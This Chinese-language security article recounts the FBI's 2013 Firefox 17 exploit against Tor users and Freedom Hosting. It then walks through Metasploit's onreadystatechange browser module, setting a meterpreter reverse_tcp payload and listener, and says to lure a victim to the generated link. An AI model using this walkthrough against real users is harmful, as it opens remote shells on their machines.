Tor網絡是一種允許用戶匿名訪問網站和其他服務的網絡。在這個網絡中，存在一種稱為黑暗網絡(darknet)的服務，從論壇到電子郵件都有，這些服務是只有通過tor才可以訪問。

Tor通過志愿者提供的3000多個中繼傳輸網絡流量從而隱藏真實用戶的位置信息。盡管Tor網絡上的很多服務都是清白的，但是它的匿名性也吸引了很多具有犯罪意圖的人，比如傳播兒童色情的組織。

出生于美國的Eric Eoin Marques居住在愛爾蘭的都柏林，他是Freedom Hosting的首席架構師，而Freedom Hosting在歐洲的550臺服務器被指控用來托管兒童色情網站。

Freedom Hosting就是Tor網絡上的一個重要的服務提供商。它的服務只能通過tor網絡來訪問。因為它涉嫌違法的事情，所以Tor的負責人還特地發表過聲明，稱他們跟運營Freedom Hosting的人沒有任何關系。聲明如下：

“運營Freedom Hosting的人或組織跟開發Tor軟件的團隊沒有任何關聯和隸屬關系。過去，曾有敵對的組織試圖繞過tor隱藏的服務，直接攻擊tor網絡背后服務器上的軟件。通常都是利用php，mysql和其他的軟件的漏洞而不是tor本身的漏洞。最近有消息表明，有人成功利用了Freedom Hosting背后的軟件漏洞。據我們所知是利用了Firefox 17 ESR的一個bug，tor瀏覽器就是基于這個firefox版本的。我們會研究這些bug，并盡快修復他們。

FBI利用了firefox17的一個漏洞，成功追蹤到了Freedom Hosting的服務器。它使用的payload是收集電腦的MAC地址和hostname，然后通過http協議發送到自己控制的服務器上從而獲得真實的ip地址。

Mozilla Firefox 小于22.0的版本，Firefox ESR 17.x，小于17.07的版本，Thunderbird ESR 17.x，小于17.07的版本沒有妥善的處理onreadystatechange事件，導致遠程攻擊者可以拒絕服務攻擊(程序crash)或者可能執行任意代碼。

2013年8月份的時候就已經有人在利用這個漏洞攻擊Tor browser的用戶了。現在msf上已經有利用模塊，針對firefox17.06.模塊使用說明：

windows/browser/mozilla_firefox_onreadystatechange:

輸入show options檢查這個exp的配置項

SRVHOST是msf本機的地址，這里配置命令是set SRVHOST 192.168.0.3

然后設置payloadset PAYLOAD windows/meterpreter/reverse_tcp

輸入show options查看payload的配置項

設置接受反彈shell的地址 set LHOST 192.168.0.103

輸入run命令開始監聽:

只要讓受害者訪問這個exp生成的鏈接就可以了.這里是http://192.168.0.103:8080/2Hek0bdO

如果對方的瀏覽器存在漏洞可以看到msf的輸出如下：

參考資料：

http://rt.com/usa/fbi-exploiting-tor-child-porn-842/

http://siliconangle.com/blog/2013/08/06/darknet-freedom-hosting-sites-shutdown-led-by-fbi-exploit-use-against-tor-network/

http://thehackernews.com/2013/08/Firefox-Exploit-Tor-Network-child-pornography-Freedom-Hosting.html

http://www.rapid7.com/db/modules/exploit/windows/browser/mozilla_firefox_onreadystatechange

via http://resources.infosecinstitute.com 翻譯整理by litdg@freebuf